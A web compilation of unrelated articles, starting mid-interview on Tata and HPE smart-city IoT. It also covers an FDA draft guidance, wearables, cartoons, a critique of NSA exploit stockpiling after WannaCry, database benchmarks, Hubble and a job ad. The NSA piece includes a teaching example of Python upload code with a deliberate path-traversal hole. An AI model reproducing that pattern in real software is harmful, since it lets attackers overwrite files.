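As a rough, back-of-the-envelope illustration of that arithmetic, here is a hypothetical Python sketch, not anything Tata or HPE actually deploys: it estimates the nightly cost of one lamp from a dimming schedule. The 20 percent dim level and the assumption that cost scales linearly with brightness are illustrative only; the rest of the savings quoted in the interview also come from the halogen-to-LED conversion.

```python
# Hypothetical back-of-the-envelope model of the streetlight savings described
# above. Figures are illustrative; cost is assumed to scale with brightness.

FULL_COST_PER_HOUR = 0.15 / 12  # ~$0.15 for 12 hours at full brightness

# (hours, brightness fraction): bright during busy hours, dimmed afterwards,
# stepped down in 10 percent increments as described in the interview.
optimized_schedule = [
    (3.0, 1.0),   # e.g. 7:00-10:00 pm at full brightness
    (9.0, 0.2),   # rest of the night dimmed to 20 percent (assumed level)
]

def nightly_cost(schedule, cost_per_full_hour=FULL_COST_PER_HOUR):
    """Sum of hours * brightness * full-brightness cost per hour."""
    return sum(h * b * cost_per_full_hour for h, b in schedule)

baseline = nightly_cost([(12.0, 1.0)])       # always-on baseline: ~$0.15
optimized = nightly_cost(optimized_schedule)
print(f"baseline ${baseline:.2f}, optimized ${optimized:.2f}, "
      f"saving {100 * (1 - optimized / baseline):.0f}%")   # ~60%
```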

The question you are asking is an interesting one, because each of the applications has its own way of returning the investment while resources are being optimized. There is also a collateral benefit of helping the environment. So not only do I gain business savings and business optimization, but I also pass on a bigger message of a green environment. Environment and safety are the two biggest benefits of implementing this, and they really appeal to our customers.

Gardner: It's always great to put hard economic metrics on these things, but Shridhar just mentioned safety. Even when you can't measure it in direct economic terms, it's invaluable when you can bring a higher degree of safety to an urban environment.

It opens up the streets to more foot traffic, which can lead to greater economic development, which can then provide more tax revenue. It seems to me that there is a multiplier effect when you have this sort of intelligent urban landscape, creating a cascading set of benefits: the more data, the more efficiency; the more efficiency, the more economic development; the more revenue, the more data, and so on. So tell us a little bit about this ongoing multiplier and virtuous adoption benefit when you move to intelligent urban environments.

Quality of life, under control

Upton: Yes, and it's important to note that it differs almost country by country, and region by region within countries. The interesting challenge with smart cities is that you're often dealing with elected officials rather than hard-nosed businesspeople who are only interested in the financial return. And because you're dealing with politicians, who represent the citizens of their city, town, or region, their priorities are not always the same.

There is quite a variation in the particular challenges -- social challenges as well as quality-of-life challenges -- in each of the areas they work in. So things like personal safety are a very big deal in some regions. I am currently in Tokyo, and here there is much more concern around quality of life and mobility with a rapidly aging population, so their challenges are somewhat different.
But in India, the set of opportunities and challenges is that combination of economic and social. If you solve them and essentially give citizens more peace of mind, more ability to move freely and to take part in the economic interaction within that area, then undoubtedly that leads to greater growth. But it is worth bearing in mind that it does vary almost city by city and region by region.

Gardner: Shridhar, do you have any other input on the cascading, ongoing set of benefits you get from more data and more network opportunity? I am trying to understand, as a longer-term objective, what the ongoing benefits of being intelligent and data-driven might be. How can this become a long-term data and analytics treasure trove when you think about how to provide better urban experiences?

Home/work help

Shridhar: From our perspective, when we looked at the customer benefits, there has been a huge amount of focus on smart cities and how they benefit from such a network. If you look at enterprise customers, they are also looking at safety, which is an application that overlaps with what a smart city would have.

So the enterprise wants to provide safety to its workers, for example in mines or in difficult terrain, environments where the focus is on helping them. Or women's safety, which as you know is a big issue in India as well -- how do you provide a device that is not very obvious and yet gives women the safety they need?

All of this, in some form, is providing data. One of the things that comes to mind when you ask how data-driven these services can be, and what kind of quality they would give, is customer-service devices. For example, a housewife could have a multi-button device with which she can order a service.

Depending on which service she presses, aggregated across households in India, you would know the trends and direction for a certain service. Mind you, it could be as simple as a three-button device that says Service A, Service B, Service C, and the consumer service extended to a particular household is something we could sell as a service.

So you could see lots of trends and patterns emerging from that, and we believe the customer experience is going to change, because the customer no longer has to remember phone numbers or apps to place an order; you give them the convenience of a simple button-press service. That immediately comes to mind.

Feedback fosters change

The second one is feedback. You use the same three-button device to rate the quality of the various utilities you are using. There is also a toilet revolution underway in India, for example; you put these buttons out there and they will tell you at any given point in time what the user satisfaction is, and so on.

So all of this is data being gathered, and while it is early days for us to put out analytics and point to distinct benefits, some of the things customers are already looking at are which geographies, which segments, and which customer profiles are using this the most, and so on. That kind of information is going to come out very distinctly.

Smart cities are all about experience. Enterprises are now looking at the data that is coming out and seeing how they can use it to segment better and provide a better customer experience, which would obviously mean both adding to their top line and helping them manage their bottom line. So it goes beyond safety into the realm of managing customer experience.

Gardner: From a go-to-market perspective, or a go-to-cities perspective, these are very complex undertakings, with lots of moving parts and lots of different technologies and standards. How are Tata and HPE coming together -- along with other service providers, Pointnext for example? How do you put this into a package that can actually be managed and put in place? How do we make this appealing not only in terms of its potential, but also actionable across different cities and regions?

Upton: The concept of smart cities has been around for a while, and various governments around the world have pumped money into their cities over an extended period of time.

As usual, these things always take more time than you think, and I do not believe that today we have a technology challenge on our hands; we have much more of a business-model challenge. Deploying technology to bring benefits to citizens is finally getting to the point where it is much better understood. There has been very rapid innovation at the device level -- whether it's streetlights or the ability to measure water quality, sound quality, or humidity, all of these metrics are available to us now -- and in the economics of producing those devices at a price that will enable widespread deployment.

All that has been happening rapidly over the last few years getting us to the point where we now have the infrastructure in place, we have the price points in place, and we have IoT becoming mainstream enough that it is entering into the manufacturing process of all sorts of different devices, as I said, ranging from streetlights to personal security devices through to track and trace devices that are built into the manufacturing process of goods.
That is now reaching the mainstream, and we are able to take advantage of the massive amount of data being produced to build even more efficient, smarter cities and make them safer places for our citizens.

Gardner: Last word to you, Shridhar. If people want to learn more about the pilot proofs of concept (PoCs) that you are doing at Jamshedpur and other cities through the Smart Cities Mission, where might they go? Are there any resources? How would you provide more information to those interested in pursuing these technologies?

Pilot projects take flight

Shridhar: I would be very happy to help them look at the PoCs that we are doing. I would classify them as follows: one is safety; energy management, which we talked about, is another big bucket; then there is the customer service I spoke about; and the fourth is more on the utility side. Gas and water are two big applications where customers are looking at these PoCs very seriously.

And there is one very interesting application that a customer wanted for pest control: he wanted his mouse traps to have sensors so that at any point in time he would know whether anything had been trapped at all, which I thought was a very interesting thing.
There are multiple streams, and we have done multiple PoCs. As the Tata Communications team we would be very happy to provide more information, and the HPE folks are in touch with us.

You could write to us, to me in particular. We are also putting information on our website, and we have marketing collateral that describes this. We will do some joint workshops with HPE as well.

So there are multiple ways to reach us, and one of the best ways obviously is through our website. We are always there to help, and we believe we can't do it all alone; it's about the ecosystem getting to know the technology and getting to work on it.

While we have partners like HPE at the platform level, we also have partners such as Semtech, which established a Center of Excellence in Mumbai along with us. So access to the ecosystem, from HPE as well as our other partners, is available, and we are happy to work together and co-create solutions going forward.


          New Draft Guidance Issued by FDA for Animal Studies for Medical Devices        
The United States Food and Drug Administration has issued a new draft guidance that highlights suggested industry procedures and practices for conducting and reporting animal studies for medical devices. The guidance will be open for public comment over the next 90 days. It was released following a paper by the University of Edinburgh, which indicated that researchers are not doing their due diligence to eliminate potential bias from animal testing. This, the authors said, could be compromising the validity of their findings.

During the first phase of device or drug development, researchers test the given product on animals in order to analyze possible safety concerns. This may also be done to demonstrate proof of concept in a living system. Biased or flawed animal testing, even if unintentional, misrepresents the findings of the research. This can result in failed clinical trials with human subjects and massive losses of time and money.

Led by Malcolm Macleod, a team of researchers from the University of Edinburgh surveyed thousands of peer-reviewed animal studies and discovered that a large proportion of authors were not doing enough to make certain that good research practices were being followed. The findings, published in PLOS Biology, suggested that two thirds of the animal studies being conducted in the United Kingdom had questionable validity owing to poor research design.

Speaking to The Guardian, Macleod said that researchers could do a lot more to ensure good research practice. If researchers do their due diligence, the science will become stronger in terms of findings being translatable into new disease treatments. Some of Macleod's major concerns were that studies failed to blindly evaluate animal health at the conclusion of the treatments, failed to randomize animals into treatment and control groups, or did not keep a record of animals that were eliminated from the studies.

          Japan Makes Headway in Fashionable Hi-Tech Wearable        
Hi-tech wearables, or smart wearables, are a nascent technology, and none of the current products combines the function, fashion, and battery life expected of them. To have it all is not a reality yet. What has been achieved so far is a combination of either function and fashion, battery and fashion, or battery and function, which leaves room to advance further toward the desired product. In the smart-wearables arena, several college students in Japan are working to design smart wearable fashion accessories. The idea of the drive is to support "scientific girls", an initiative undertaken by Recruit Technologies, Advanced Technology Lab, and Rikejo University. Educational institutions throughout Japan are working to promote technology education among women. Fashion is seen all over Japan, so a project to inspire women to create smart technology accessories in keeping with fashion seems apt for the initiative. The results may not be on par with an 'Android wearable' or the 'Apple Watch', but they are surely the beginning of several proofs of concept that may lead to the design and creation of decorative accessories such as hair-bands, bracelets, and necklaces. Japan has been at the forefront of developing wearable accessories and has a lot to offer; the zealous enthusiasm and participation from students across colleges in Japan produced smart, fashionable models in a matter of a few months. In general, STEM (Science, Technology, Engineering and Mathematics) careers are promoted for women worldwide, but this is particularly important in Japan due to a mishap related to the initiative: a stem cell research report by a prominent female researcher, Dr Haruko Obokata, and her associate Dr Yoshiki Sasai was caught in a controversy which led the latter to commit suicide.

          "All Ages" Means ALL Ages: For Adults who Watch Kids' Cartoons        

My family saw television as a shared activity: we watched CSI: Las Vegas at dinner, and House before bed. As large a unifying role as television played in my childhood, one type of programming never made the cut: animation. My parents, like many adults, didn’t consider animation a medium that held value.

Despite the fact that adults in America have watched cartoons for a long time – The Simpsons first aired in 1989 and has secured renewal until 2019 – the association of cartoons as being only for children still prevails.

And yet, older teenagers and millennial adults are watching more animated shows, despite the stigma of immaturity. Moreover, they are watching actual kids' cartoons, not animated adult programming à la The Simpsons, and with no children of their own to watch with them. Some adults are driven by nostalgia: reboots of classics like Teen Titans Go! draw in older fans of the original series with in-jokes and references. But new cartoons without the cultural clout of a popular predecessor have also amassed huge adult audiences.

Steven Universe, a show without a forerunner, occupied two spots in the top 15 cable broadcasts the day it debuted its fifth season, proving its popularity with audiences of all ages. Notable for its more-than-subtextual queer themes, the series has a fandom fiercely protective of its queer representation. To see yourself reflected in the media you consume is to have your existence validated. To see yourself represented thoughtfully, with complexity and authenticity, is to have your humanity validated. Representation in media matters. Steven Universe is popular, then, not regardless of the romance between femme-presenting aliens and subversion of gender norms, but in part because of it.

A step further lies Danger & Eggs. Like Steven Universe, the LGBTQ-inclusive Danger & Eggs has accumulated a following that spans all ages. Of all the queer representation in shows animated and live action alike, the final episode of Danger & Eggs’ first season has to be one of the most prominent, starring the most diverse spectrum of LGBTQ characters. Titled “Chosen Family,” the episode takes place at a Pride Festival and deals with themes of (you guessed it) chosen family, featuring a smorgasbord of celebratory LGBTQ imagery.

In a society that evaluates worth against a monetary ruler, supporting shows with well-crafted representation pushes back against long-standing negative tropes that reinforce patterns of inequality. The popularity of an inclusive show is proof of concept for networks concerned about profitability, and opens the door for the creation of even more inclusive content.

But ultimately, adult viewers watch Steven Universe and Danger & Eggs because they genuinely enjoy them. In a soundtrack full of silliness, Steven Universe also includes songs that ruminate on loss. Interspersed between fast-paced, gleeful jokes, Danger & Eggs delivers gems like, "Identity takes time." These shows feel cathartic to watch. If media reflects life, these cartoons imbue their reflected worlds with endless optimism: even in the midst of conflict, the light at the end of the tunnel approaches.

Moreover, the purpose of fiction has always been to transport us from the familiarity of our lives. For demographics who feel consistently unsafe or unwelcome in the “real world,” this respite is significant: viewing a place where queer identity doesn’t preclude happy endings feels good. So watching the likes of Steven Universe and Danger & Eggs can be an act of emotional self-care for those experiencing minority stress. In the iconic words of Audre Lorde, “Caring for myself is not self-indulgence, it is self-preservation, and that is an act of political warfare.”

My family still doesn't watch cartoons when we gather in the living room, though I rarely hear remarks now if my parents catch animation streaming on my laptop. Our conversations about LGBTQ issues are more likely to stem from the crime drama How to Get Away with Murder than an animated show like Danger & Eggs. But I'm still going to watch these "children's" cartoons, because they are uplifting and restorative, stickin' it to the status quo 22 minutes at a time.

August 9, 2017

          Building Stories - Suggested Reading Order        
There had to be an asshole; it had to be me. Forgive the proof of concept-y nature of this skeletal post -- I'm hoping to expand this into an essay and thusly review the comic 'n shit -- and do enjoy this suggested navigation for your Building Stories experience. It's designed to preserve surprises, evade narrative tedium, and *totally make you cry, you baby* throughout the course of Chris Ware's fascinating, flawed toy box of anxieties and reminisce:

0. [THAT GIVEAWAY PREVIEW COMIC, LANDSCAPE FORMAT, IF YOU HAVE IT]

1. [THE LITTLE GOLDEN BOOK] - collecting the New York Times serial

2. [THE 'PRE-CHILD' ACCORDION FOLDOUT] - start on the side reading "I don't care..."

3. "The Daily Bee"

4. [THE THICKER BROADSHEET MAGAZINE] - starts with "god"

5. [THE OLD LADY'S SOLO COMIC]

6. [THE 'POST-CHILD' ACCORDION FOLDOUT] - start on the side reading "Her laugh is..."

7. [THE DOUBLE-SIDED 'POSTER'] - start on the side reading "As a kid,"

8. [THE THINNER BROADSHEET MAGAZINE] - reprinting the Kramers Ergot 7 story (and more)

9. [THE GREEN HARDCOVER BOOK] - reprinting ACME Novelty Library #18, w' edits

10. "Branford - the Best Bee in the World"

11. [THE 'BOARD GAME']

12. [THE YOUNG WIFE'S SOLO ISSUE]

13. "Disconnect"

14. [THE WORDLESS LANDSCAPE COMIC]

More later, maybe...
          US Government Malware Policy Puts Everyone At Risk        
The NSA was weaponizing software vulnerabilities that it should have been helping to fix.

Last month, a massive ransomware attack hit computers around the globe, and the government is partly to blame.

The malicious software, known as “WannaCry,” encrypted files on users’ machines, effectively locking them out of their information, and demanded a payment to unlock them. This attack spread rapidly through a vulnerability in a widely deployed component of Microsoft's Windows operating system, and placed hospitals, local governments, banks, small businesses, and more in harm's way.

This happened in no small part because of U.S. government decisions that prioritized offensive capabilities — the ability to execute cyberattacks for intelligence purposes — over the security of the world’s computer systems. The decision to make offensive capabilities the priority is a mistake. And at a minimum, this decision is one that should be reached openly and democratically. A bill has been proposed to try to improve oversight on these offensive capabilities, but oversight alone may not address the risks and perverse incentives created by the way they work. It’s worth unpacking the details of how these dangerous weapons come to be.

Why did it happen?

All complex software has flaws — mistakes in design or implementation — and some of these flaws rise to the level of a vulnerability, where the software can be tricked or forced to do something that it promised its users it would not do.

For example, consider one computer, running a program designed to receive files from other computers over a network. That program has effectively promised that it will do no more than receive files. If it turns out that a bug allows another computer to force that same program to delete unrelated files, or to run arbitrary code, then that flaw is a security vulnerability. The flaw exploited by WannaCry is exactly such a vulnerability in part of Microsoft’s Windows operating system, and it has existed (unknown by most people) for many years, possibly as far back as the year 2000.
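To make that concrete, here is a deliberately simplified, hypothetical sketch in Python (unrelated to the actual Windows flaw WannaCry exploited) of a file-receiving routine that breaks its promise: because it trusts the client-supplied filename, a name like "../../home/user/.profile" lets a remote peer overwrite files it was never supposed to touch. The fixed variant keeps the same interface but rejects names that escape the upload directory.

```python
import os

STORAGE_DIR = "/srv/incoming"  # hypothetical upload directory

def save_uploaded_file_vulnerable(filename: str, data: bytes) -> None:
    """Promises to write only inside STORAGE_DIR, but never checks the
    client-supplied name, so "../../tmp/x" escapes the directory (the bug)."""
    path = os.path.join(STORAGE_DIR, filename)   # attacker controls `filename`
    with open(path, "wb") as f:
        f.write(data)

def save_uploaded_file_fixed(filename: str, data: bytes) -> None:
    """Same interface, but refuses any name that resolves outside STORAGE_DIR."""
    path = os.path.realpath(os.path.join(STORAGE_DIR, filename))
    if not path.startswith(os.path.realpath(STORAGE_DIR) + os.sep):
        raise ValueError("refusing to write outside the upload directory")
    with open(path, "wb") as f:
        f.write(data)
```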

When researchers discover a previously unknown bug in a piece of software (often called a “zero day”), they have several options:

  1. They can report the problem to the supplier of the software (Microsoft, in this case).
  2. They can write a simple program to demonstrate the bug (a “proof of concept”) to try to get the software supplier to take the bug report seriously.
  3. If the flawed program is free or open source software, they can develop a fix for the problem and supply it alongside the bug report.
  4. They can announce the problem publicly to bring attention to it, with the goal of increasing pressure to get a fix deployed (or getting people to stop using the vulnerable software at all).
  5. They can try to sell exclusive access to information about the vulnerability on the global market, where governments and other organizations buy this information for offensive use.
  6. They can write a program to aggressively take advantage of the bug (an “exploit”) in the hopes of using it later to attack an adversary who is still using the vulnerable code.

Note that these last two actions (selling information or building exploits) are at odds with the first four. If the flaw gets fixed, exploits aren't as useful and knowledge about the vulnerability isn't as valuable.

Where does the U.S. government fit in?

The NSA didn’t develop the WannaCry ransomware, but they knew about the flaw it used to compromise hundreds of thousands of machines. We don't know how they learned of the vulnerability — whether they purchased knowledge of it from one of the specialized companies that sell the knowledge of software flaws to governments around the world, or from an individual researcher, or whether they discovered it themselves. It is clear, however, that they knew about its existence for many years. At any point after they learned about it, they could have disclosed it to Microsoft, and Microsoft could have released a fix for it. Microsoft releases such fixes, called “patches,” on a roughly monthly basis. But the NSA didn't tell Microsoft about it until early this year.

Instead, at some point after learning of the vulnerability, the NSA developed or purchased an exploit that could take advantage of the vulnerability. This exploit — a weapon made of code, codenamed “ETERNALBLUE,” specific to this particular flaw — allowed the NSA to turn their knowledge of the vulnerability into access to others’ systems. During the years that they had this weapon, the NSA most likely used it against people, organizations, systems, or networks that they considered legitimate targets, such as foreign governments or their agents, or systems those targets might have accessed.

The NSA knew about a disastrous flaw in a widely used piece of software -- as well as code to exploit it -- for over five years without trying to get it fixed. In the meantime, others may have discovered the same vulnerability and built their own exploits.

Any time the NSA used their exploit against someone, they ran the risk of their target noticing their activity by capturing network traffic — allowing the target to potentially gain knowledge of an incredibly dangerous exploit and the unpatched vulnerability it relied on. Once someone had a copy of the exploit, they would be able to change it to do whatever they wanted by changing its "payload" — the part of the overall malicious software that performs actions on a targeted computer. And this is exactly what we saw happen with the WannaCry ransomware. The NSA payload (a software "Swiss Army knife" codenamed DOUBLEPULSAR that allowed NSA analysts to perform a variety of actions on a target system) was replaced with malware with a very specific purpose: encrypting all of a user's data and demanding a ransom.

At some point, before WannaCry hit the general public, the NSA learned that the weapon they had developed and held internally had leaked. Sometime after that, someone alerted Microsoft of the problem, kicking off Microsoft’s security response processes. Microsoft normally credits security researchers by name or “handle” in their security updates, but in this case, they are not saying who told them. We don't know whether the weapon leaked earlier, of course — or whether anyone else had independently discovered knowledge of the vulnerability and used it (with this particular exploit or another one) to attack other computers. And neither does the NSA. What we do know is that everyone in the world running a Windows operating system was vulnerable for years to anyone who knew about the vulnerability; that the NSA had an opportunity to fix that problem for years; and that they didn't take steps to fix the problem until they realized that their own data systems had been compromised.

A failure of information security

The NSA is ostensibly responsible for protecting the information security of America, while also being responsible for offensive capabilities. “Information Assurance” (securing critical American IT infrastructure) sits next to “Signals Intelligence” (surveillance) and “Computer Network Operations” (hacking/infiltration of others’ networks) right in the Agency’s mission statement. We can see from this fiasco where the priorities of the agency lie.

And the NSA isn’t the only agency charged with keeping the public safe but putting us all at risk. The FBI also hoards knowledge of vulnerabilities and maintains a stockpile of exploits that take advantage of them. The FBI’s mission statement says that it works “to protect the U.S. from terrorism, espionage, cyberattacks….” Why are these agencies gambling with the safety of public infrastructure?

The societal risks of these electronic exploits and defenses can be seen clearly by drawing a parallel to the balance of risk with biological weapons and public health programs.

If a disease-causing micro-organism is discovered, it takes time to develop a vaccine that prevents it. And once the vaccine is developed, it takes time and logistical work to get the population vaccinated. The same is true for a software vulnerability: it takes time to develop a patch, and time and logistical work to deploy the patch once developed. A vaccination program may not ever be universal, just as a given patch may not ever be deployed across every vulnerable networked computer on the planet.

It’s also possible to take a disease-causing micro-organism and “weaponize” it — for example, by expanding the range of temperatures at which it remains viable, or just by producing delivery “bomblets” capable of spreading it rapidly over an area. These weaponized germs are the equivalent of exploits like ETERNALBLUE. And a vaccinated (or "patched") population isn't vulnerable to the bioweapon anymore.

Our government agencies are supposed to protect us. They know these vulnerabilities are dangerous. Do we want them to delay the creation of vaccine programs, just so they can have a stockpile of effective weapons to use in the future?

What if the Centers for Disease Control and Prevention were, in addition to its current mandate of protecting “America from health, safety and security threats, both foreign and in the U.S.,” responsible for designing and stockpiling biological weapons for use against foreign adversaries? Is it better or worse for the same agency to be responsible for both defending our society and for keeping it vulnerable? What should happen if some part of the government or an independent researcher discovers a particularly nasty germ — should the CDC be informed? Should a government agency that discovers such a germ be allowed to consider keeping it secret so it can use it against people it thinks are "bad guys" even though the rest of the population is vulnerable as well? What incentive does a safety-minded independent researcher have to share such a scary discovery with the CDC if he or she knows the agency might decide to use the dangerous information offensively instead of to protect the public health?

What if a part of the government were actively weaponizing biological agents, figuring out how to make them disperse more widely, or crafting effective delivery vehicles?

These kinds of weapons cannot be deployed without some risk that they will spread, which is why bioweapons have been prohibited by international convention for over 40 years. Someone exposed to a germ can culture it and produce more of it. Someone exposed to malware can make a copy, inspect it, modify it, and re-deploy it. Should we accept this kind of activity from agencies charged with public safety? Unfortunately, this question has not been publicly and fully debated by Congress, despite the fact that several government agencies stockpile exploits and use them against computers on the public network.

Value judgments that should not be made in secret

Defenders of the FBI and the NSA may claim that offensive measures like ETERNALBLUE are necessary when our government is engaged in espionage and warfare against adversaries who might also possess caches of weaponized exploits for undisclosed vulnerabilities. Even the most strident supporters of these tactics, however, must recognize that in the case of ETERNALBLUE and the underlying vulnerability it exploits, the NSA failed as stewards of America's — and the world's — cybersecurity, by failing to disclose the vulnerability to Microsoft to be fixed until after their fully weaponized exploit had fallen into unknown hands. Moreover, even if failing to disclose a vulnerability is appropriate in a small subset of cases, policy around how these decisions are made should not be developed purely by the executive branch behind closed doors, insulated from public scrutiny and oversight.

A bipartisan group of US Senators has introduced a bill called the Protecting our Ability To Counter Hacking (PATCH) Act, which would create a Vulnerabilities Equities Review Board with representatives from DHS, NSA, and other agencies to assess whether any known vulnerability should be disclosed (so that it can be fixed) or kept secret (thereby leaving our communications systems vulnerable). If the government plans to retain a cache of cyberweapons that may put the public at risk, ensuring that there is a permanent and more transparent deliberative process is certainly a step in the right direction. However, it is only one piece of the cybersecurity puzzle. The government must also take steps to ensure that any such process fully considers the duty to secure our globally shared communications infrastructure, has a strong presumption in favor of timely disclosure, and incentivizes developers to patch known vulnerabilities.

This will not be the last time one of these digital weapons leaks or is stolen, and one way to limit the damage any one of them causes is by shortening the lifetime of the vulnerabilities they rely on.


          Big Data Project Manager (M/F)        
Page Personnel is recruiting, on behalf of its client, a company in the Alpes-Maritimes specializing in electrical and digital building infrastructure, a Big Data Project Manager who will be responsible for implementing a Big Data processing solution (Braincube) at the production site. Reporting to the Maintenance Department, the Big Data Project Manager will play a cross-functional role in carrying out the POC (Proof of Concept), and will ...
          Proof of Concept: Putting Ideas to the Test        
Anyone who does not deal with company start-ups day in, day out, or work in research and development, is likely to stumble over the term proof of concept. Fortunately, it does not come up in everyday life; at least it has not crossed my path there yet. It could, however, come up at the office -- and then we should be prepared. A proof of concept is evidence that a particular undertaking
          The ParAccel TPC-H Benchmark Controversy        

ParAccel, one of the new analytic DBMS vendors, recently announced some impressive TPC-H benchmark results. A good review of these results can be found on Merv Adrian's blog at this link.

Not everyone agreed with Merv's balanced review. Curt Monash commented that "The TPC-H benchmark is a blight upon the industry." See his blog entry at this link.

This blog entry resulted in some 41 (somewhat heated) responses. At one point Curt made some negative comments about ParAccel's VP of Marketing, Kim Stanick, which in turn led to accusations that his blog entry was influenced by personal feelings.

I have two comments to make about this controversy. The first concerns the TPC-H benchmark and the second is about an increasing lack of social networking etiquette by analysts.

TPC benchmarks have always been controversial. People often argue that they do not represent real-life workloads. What this really means is that your mileage may vary. These benchmarks are expensive to run, and vendors throw every piece of technology at the benchmark in order to get good results. Some vendors are rumored to have even added special features to their products to improve the results. The upside of the benchmarks is that they are audited and reasonably well documented.

The use of TPC benchmarks has slowed over recent years. This is not only because they are expensive to run, but also because they have less marketing impact than in the past. In general, they have been of more use to hardware vendors because they demonstrate hardware scalability and provide hardware price/performance numbers. Oracle was perhaps an exception here because they liked to run full-page advertisements saying they were the fastest database system in existence.

TPC benchmarks do have some value to both the vendor and the customer. The benefits to the vendor are increased visibility and credibility. Merv Adrian described this as a "rite of passage." It helps the vendor get on the short list. For the customer, these benchmarks show the solution to be credible and scalable. All products work well in PowerPoint, but the TPC benchmarks demonstrate that the solution is more than just vaporware.

I think most customers are knowledgeable enough to realize that the benchmark may not match their own workloads or scale as well in their own environments. This is where the proof of concept (POC) benchmark comes in. The POC enables the customer to evaluate the product using their own workloads.

TPC benchmarks are not perfect, but they do provide some helpful information in the decision making process.

I will address the issue of blog etiquette in a separate blog entry.  




          Data Warehousing in the Cloud Gains Momentum        

The use of cloud computing for data warehousing is getting a lot of attention from vendors. Following hot on the heels of Vertica's Analytic Database v3.0 for the Cloud announcement on June 1 was yesterday's Greenplum announcement of its Enterprise Data Cloud™ platform and today's announcement by Aster of .NET MapReduce support for its nCluster Cloud Edition.

I have interviewed all three vendors over the past week and while there are some common characteristics in the approaches being taken by the three vendors to cloud computing, there are also some differences.

Common characteristics include:

  • Software only analytic DBMS solutions running on commodity hardware
  • Massively parallel processing
  • Focus on elastic scaling, high availability through software, and easy administration
  • Acceptance of alternative database models such as MapReduce
  • Very large databases supporting near-real-time user-facing applications, scientific applications, and new types of business solution
The emphasis of Greenplum is on a platform that enables organizations to create and manage data warehouses and data marts using a common pool of physical, virtual or public cloud infrastructure resources. The concept here is that multiple data warehouses and data marts are a fact of life, and the best approach is to put these multiple data stores onto a common and flexible analytical processing platform that provides easy administration and fast deployment using good-enough data. Greenplum sees this approach being used initially on private clouds, but with the use of public clouds growing over time.

Aster's emphasis is on extending analytical processing to the large audience of Java, C++ and C# programmers who don't know SQL. They see these developers creating custom analytical MapReduce functions for use by BI developers and analysts who can use these functions in SQL statements without any programming involved.

Although MapReduce has typically been used by Java programmers, there is also a large audience of Microsoft .NET developers who could potentially use MapReduce. A recent report by Forrester, for example, shows 64% of organizations use Java and 43% use C#. The objective of Aster is to extend the use of MapReduce from web-centric organizations into large enterprises by improving its programming, availability and administration capabilities over and above open source MapReduce solutions such as Hadoop.
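To show the division of labor being described -- a developer writes map and reduce functions once, and analysts then apply them to rows of data without further programming -- here is a minimal sketch of the MapReduce pattern in plain Python. It is illustrative only: it is not Aster's SQL/MapReduce API or its .NET binding, and the row format and function names are assumptions.

```python
# Minimal sketch of the MapReduce pattern: a mapper emits (key, value) pairs
# per input row, and a reducer aggregates the values grouped by key.
from collections import defaultdict
from typing import Iterable, Tuple

def map_clicks(row: dict) -> Iterable[Tuple[str, int]]:
    """Map step: emit (user, 1) for every click-event row."""
    if row.get("event") == "click":
        yield (row["user"], 1)

def reduce_counts(key: str, values: Iterable[int]) -> Tuple[str, int]:
    """Reduce step: sum the emitted values per key."""
    return key, sum(values)

def run_mapreduce(rows, mapper, reducer):
    """Group the mapper's output by key, then apply the reducer per group."""
    groups = defaultdict(list)
    for row in rows:
        for key, value in mapper(row):
            groups[key].append(value)
    return [reducer(key, values) for key, values in groups.items()]

rows = [
    {"user": "a", "event": "click"},
    {"user": "b", "event": "view"},
    {"user": "a", "event": "click"},
]
print(run_mapreduce(rows, map_clicks, reduce_counts))  # [('a', 2)]
```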

Vertica sees its data warehouse cloud computing environment being used for proof of concept projects, spillover capacity for enterprise projects, and software-as-a-service (SaaS) applications. Like Greenplum, it supports virtualization. Its Analytic Database v3.0 for the Cloud adds support for more cloud platforms, including Amazon Machine Images and early support for the Sun Compute Cloud. It also adds several cloud-friendly administration features based on open source solutions such as Webmin and Ganglia.

It is important for organizations to understand where cloud computing and new approaches such as MapReduce fit into the enterprise data warehousing environment. Over the course of the next few months my monthly newsletter on the BeyeNETWORK will look at these topics in more detail and review the pros and cons of these new approaches.


          Hubble to Proceed with Full Search for New Horizons Targets        

Planetary scientists have successfully used the Hubble Space Telescope to boldly look out to the far frontier of the solar system to find suitable targets for NASA's New Horizons mission to Pluto. After the marathon probe zooms past Pluto in July 2015, it will travel across the Kuiper Belt - a vast rim of primitive ice bodies left over from the birth of our solar system 4.6 billion years ago. If NASA approves, the probe could be redirected to fly to a Kuiper Belt object (KBO) and photograph it up close.

As a first step, Hubble found two KBOs drifting against the starry background. They may or may not be the ideal target for New Horizons. Nevertheless, the observation is proof of concept that Hubble can go forward with an approved deeper KBO search, covering an area of sky roughly the angular size of the full Moon. The exceedingly challenging observation amounted to finding something no bigger than Manhattan Island, and charcoal black, located 4 billion miles away.


          (USA-GA-DULUTH) Technical Manager - Dairy        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. 
